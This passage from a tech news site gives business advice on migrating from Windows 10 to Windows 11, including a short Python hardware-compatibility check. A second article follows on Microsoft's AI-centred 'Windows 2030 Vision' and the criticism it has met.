    • Performance and efficiency: New devices with Windows 11 pre-installed are often lighter, more energy-efficient and more powerful, also thanks to support for ARM architecture. This means longer battery life and a better user experience.

    A chaotic last-minute migration is a recipe for disaster. Companies that have not yet started the process should follow a well-thought-out plan:

    1. Infrastructure audit: The first step is to inventory the hardware and software. It is important to identify which devices are compatible with Windows 11 and which need to be replaced. It is also crucial to check that business-critical applications run correctly on the new system.
    2. Create a schedule: Based on the audit, a detailed migration roadmap should be prepared, identifying which departments or user groups will be switched first. It is worth starting with pilot projects.
    3. Data management and backup: Before migration, it is crucial to create full backups of data. Modern cloud tools make this process much easier, but it requires planning.
    4. Communication and training: Employees need to understand why the change is necessary and how it will affect their daily work. Transparent communication and short training sessions will minimise resistance and fears, ensuring a smooth transition.
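    The audit in step 1 ultimately reduces to checking every machine against the Windows 11 baseline. A minimal sketch of such a fleet check, assuming hypothetical inventory records (the thresholds mirror Microsoft's published minimums: TPM 2.0, Secure Boot, 4 GB RAM, 64 GB storage):

    ```python
    from dataclasses import dataclass

    @dataclass
    class Device:
        """Hypothetical inventory record produced by the hardware audit."""
        name: str
        tpm_version: float      # 0.0 if no TPM present
        secure_boot: bool       # UEFI Secure Boot capable
        ram_gb: int
        storage_gb: int

    def win11_blockers(d: Device) -> list:
        """Return the Windows 11 minimum requirements this device fails."""
        blockers = []
        if d.tpm_version < 2.0:
            blockers.append("TPM 2.0 missing")
        if not d.secure_boot:
            blockers.append("Secure Boot unsupported")
        if d.ram_gb < 4:
            blockers.append("less than 4 GB RAM")
        if d.storage_gb < 64:
            blockers.append("less than 64 GB storage")
        return blockers

    fleet = [
        Device("reception-pc", tpm_version=1.2, secure_boot=False, ram_gb=4, storage_gb=128),
        Device("dev-laptop",   tpm_version=2.0, secure_boot=True,  ram_gb=16, storage_gb=512),
    ]

    for device in fleet:
        blockers = win11_blockers(device)
        status = "upgrade" if not blockers else f"replace ({', '.join(blockers)})"
        print(f"{device.name}: {status}")
    ```

    In practice the records would come from an endpoint-management tool rather than being typed by hand; the point is that the audit output should name the specific blocker per machine, so the replacement budget can be estimated rather than guessed.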

    The end of support for Windows 10 is a fact. Continuing to use it will be an act of conscious acceptance of risk. For companies, the question is no longer ‘whether’ to move to Windows 11, but ‘how’ and ‘when’ to organise the process. The sooner they take action, the more control they will retain over the security and future of their digital infrastructure.

  • Windows 2030: Microsoft is betting everything on AI

    Windows 2030: Microsoft is betting everything on AI

    Microsoft has revealed a glimpse of its long-term vision for the world’s most popular operating system. In a new video series, ‘Windows 2030 Vision’, the company has outlined a future where artificial intelligence is no longer an add-on, but the foundation of the entire user experience.

    The direction is clear: in six years’ time, interaction with a computer is expected to resemble a conversation with an assistant, and the keyboard and mouse may become relics of the past.

    Microsoft’s strategy follows multi-billion-dollar investments in AI technologies, including OpenAI. The company aims to fully integrate artificial intelligence into its key products, and Windows, as the gateway to the digital world for hundreds of millions of users, is at the heart of this plan.

    It is no longer just about adding features such as Copilot. The aim is to rebuild the operating system kernel itself so that it is inherently intelligent.

    In the vision set out by Vice President of Security, David Weston, the traditional graphical interface is giving way to multimodal communication.

    The operating system of the future is supposed to understand context by seeing what the user is doing on the screen and hearing their voice commands. Instead of manually clicking through menus and windows to perform a complex task, the user is to simply delegate it to an intelligent AI agent.

    Such an agent would coordinate work between different applications and files, much as AI-integrated browsers are beginning to manage multiple tabs.

    This is a fundamental change that Microsoft CEO Satya Nadella has announced will transform the essence of operating systems. According to unofficial information, prototypes exploring this new interaction model are already being developed in Redmond.

    Despite the bold announcements, Microsoft’s vision is being met with a cool reception and raises numerous questions. Previous attempts to integrate AI into Windows 11, including the Copilot feature, have failed to deliver the promised productivity revolution and are often seen as imposed and underdeveloped.

    Key issues remain open, such as the significant increase in demand for system resources, privacy in a world where the computer ‘sees and hears’ our work, and the business model for such solutions.

    Users also fear being locked into the Microsoft ecosystem, with no choice of competing AI tools. The wider social context is also hard to ignore – the vision of office automation clashes with the wave of redundancies sweeping the tech sector.

    Its dominant position in the desktop market gives Microsoft a unique opportunity to implement this vision at massive scale. While competing chatbots remain confined to their own applications, an AI agent embedded in the operating system could become a ubiquitous coordinator of digital life.

    While the announcement that by 2030 keyboards and mice will become as alien to Generation Z as MS-DOS is today seems exaggerated, the direction of change is indisputable. Microsoft is betting on AI as the driving force behind the next generation of Windows.

    For users and businesses, this means adapting or, as critics suggest, seeking alternatives while there is time. The AI revolution in Windows has already begun.